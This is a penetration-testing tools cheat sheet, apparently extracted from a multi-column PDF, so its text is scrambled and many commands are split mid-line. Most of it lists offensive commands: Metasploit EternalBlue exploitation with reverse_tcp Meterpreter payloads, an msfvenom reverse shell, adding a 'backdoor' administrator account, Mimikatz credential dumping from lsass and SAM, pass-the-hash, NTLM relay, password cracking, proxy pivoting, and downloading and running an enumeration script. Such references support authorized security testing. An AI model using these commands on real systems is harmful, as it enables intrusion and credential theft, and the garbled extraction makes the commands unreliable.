Start TLS Server: Delete ARP cache: Scan for vulnerabilities (script category filter): Hacking Tools Cheat Sheet # ncat --ssl -l -p 1337 --ssl-cert # ip neigh flush all # nmap -n -Pn --script "vuln and safe" Compass Security, Version 1.1, January 2020 cert.pem --ssl-key key.pem Sniff traffic: 10.5.23.0/24 https://www.compass-security.com Connect to TLS service: # tcpdump [options] [filters] Performance Tuning (1 SYN packet ≈ 60 bytes # ncat --ssl 10.5.23.42 1337 Useful tcpdump options: → 20'000 packets/s ≈ 10 Mbps): Basic Linux Networking Tools Connect to TLS service using openssl: ▪ -i interface: Interface or any for all # nmap -n -Pn --min-rate 20000 10.5.23.0/24 Show IP configuration: # openssl s_client -connect ▪ -n: Disable name and port resolution # ip a l 10.5.23.42:1337 ▪ -A: Print in ASCII Useful nmap options: Change IP/MAC address: Show certificate details: ▪ -XX: Print in hex and ASCII ▪ -n: Disable name and port resolution # ip link set dev eth0 down # openssl s_client -connect ▪ -w file: Write output PCAP file ▪ -PR: ARP host discovery # macchanger -m 23:05:13:37:42:21 eth0 10.5.23.42:1337 | openssl x509 -text ▪ -r file: Read PCAP file ▪ -Pn: Disable host discovery # ip link set dev eth0 up Test TLS server certificate and ciphers: ▪ -sn: Disable port scan (host discovery only) Useful tcpdump filters: # sslyze --regular 10.5.23.42:443 ▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan Static IP address configuration: ▪ not arp: No ARP packets # ip addr add 10.5.23.42/24 dev eth0 ▪ --top-ports 50: Scan 50 top ports TCP to TLS proxy: ▪ port ftp or port 23: Only port 21 or 23 ▪ -iL file: Host input file DNS lookup: # socat TCP-LISTEN:2305,fork,reuseaddr ▪ host 10.5.23.31: Only from/to host ssl:example.com:443 ▪ -oA file: Write output files (3 types) # dig compass-security.com ▪ net 10.5.23.0/24: Only from/to hosts in ▪ -sC: Script scan (default scripts) Reverse DNS lookup: Online TLS tests: network ▪ : Specific scripts # dig -x 10.5.23.42 ▪ ssllabs.com, hardenize.com --script
-subj "/CN=example.org/" vuln-ms17-010 10.5.23.0/24 Show ARP cache: # ip neigh
Vulnerability DBs and Exploits Upgrade to Meterpreter (or press ^Z (Ctrl-Z)): bypass ExecutionPolicy and execute Invoke- Meterpreter via pass-the-hash: background AllChecks. Use the abuse functions. msf > set payload Exploit search (local copy of the Exploit-DB): Background session 1? [y/N] y windows/meterpreter/reverse_tcp Add a new local admin: # searchsploit apache > sessions # list sessions msf > set LHOST 10.5.23.42 # attacker C:\> net user backdoor P@ssw0rd23 Show exploit file path and copy it into clipboard: > sessions -u 1 # Upgrade msf > set LPORT 443 C:\> net localgroup Administrators # searchsploit -p 40142 > sessions 2 # interact with session 2 msf > set RHOST 10.5.23.21 # victim backdoor /add meterpreter > sysinfo # use it msf > set SMBPass 01[...]03:01[...]03 Online vulnerability and exploit databases: Scan for network shares: Upload / download files: msf > exploit ▪ cvedetails.com, exploit-db.com, # smbmap.py --host-file smbhosts.txt - meterpreter > upload pwn.exe meterpreter > shell packetstormsecurity.com u Administrator -p PasswordOrHash meterpreter > download c:\keepass.kdb C:\WINDOWS\system32> Cracking Execute a file: Windows Credentials Gathering NTLM Relay meterpreter > execute -i -f /your/bin Try SSH passwords from a wordlist: Start Mimikatz and create log file: Vulnerable if message_signing: disabled: # ncrack -p 22 --user root -P Port forwarding to localhost: C:\>mimikatz.exe # nmap -n -Pn -p 445 --script smb- ./passwords.txt 10.5.23.0/24 meterpreter > portfwd add -l 2323 -p # privilege::debug security-mode 10.5.23.0/24 3389 -r 10.5.23.23 # log C:\tmp\mimikatz.log Determine hash type: Disable SMB and HTTP in Responder.conf and Background Meterpreter session: # hashid 869d[...]bd88 Read lsass.exe process dump: start Responder: meterpreter > background Show example hash types for hashcat: # sekurlsa::minidump lsass.dmp # ./Responder.py -I eth0 Pivoting through existing Meterpreter session: # hashcat --example-hashes Dump lsass.exe in taskmgr or procdump. NTLM Relay to target and extract SAM file: > use post/multi/manage/autoroute Crack hashes (e.g. 5600 for NetNTLMv2 type): # ./ntlmrelayx.py -smb2support -t > set session 2 # meterpreter session Show passwords/hashes of logged in users: smb://10.5.23.42 # hashcat -m 5600 -a 0 hash.txt > run # sekurlsa::logonpasswords /path/to/wordlists/* > route Backup SYSTEM & SAM hive: NTLM Relay using socks proxy: # ./ntlmrelayx.py -tf targets.txt Crack hashes using John the Ripper: SOCKS via Meterpreter (requires autoroute): C:\>reg save HKLM\SYSTEM system.hiv -smb2support -socks # john hashes.txt > use auxiliary/server/socks4a C:\>reg save HKLM\SAM sam.hiv > set SRVPORT 8080 Extract hashes using Mimikatz: Configure ProxyChains: Metasploit Framework > run # lsadump::sam /system:system.hiv # vi /etc/proxychains.conf [...] Start Metasploit: Configure ProxyChains: /sam:sam.hiv socks4 127.0.0.1 1080 # msfconsole # vi /etc/proxychains.conf Search exploit: [...] Pass-the-Hash Access files via SOCKS proxy: > search eternalblue socks4 127.0.0.1 1080 Shell via pass-the-hash (Impacket Tools): # proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Connect through SOCKS proxy: # ./psexec.py -hashes Use exploit: Administrator%invalidPwd msf > use exploit/windows/smb/ms17_… # proxychains ncat 172.23.5.42 1337 :011AD41795657A8ED80AB3FF6F078D03 domain/[email protected] Configure exploit: Active Directory Linux Privilege Escalation Over a subnet and extract SAM file: msf exploit(…) > show options Use SharpHound to gather information and im- msf exploit(…) > set TARGET 10.5.23.42 Enumerate local information (-t for more tests): # crackmapexec -u Administrator -H port into Bloodhound to analyze. # curl -o /tmp/linenum :011AD41795657A8ED80AB3FF6F078D03 Run exploit: 10.5.23.0/24 --sam Download PingCastle from pingcastle.com and msf exploit(…) > exploit https://raw.githubusercontent.com/rebo otuser/LinEnum/master/LinEnum.sh Browse shares via pass-the-hash: generate Report. Generate reverse shell (WAR): # bash /tmp/linenum -r /tmp/report # ./smbclient.py # msfvenom -p Other hardening checks can be done using lynis domain/[email protected] -hashes More Online References java/jsp_shell_reverse_tcp LHOST=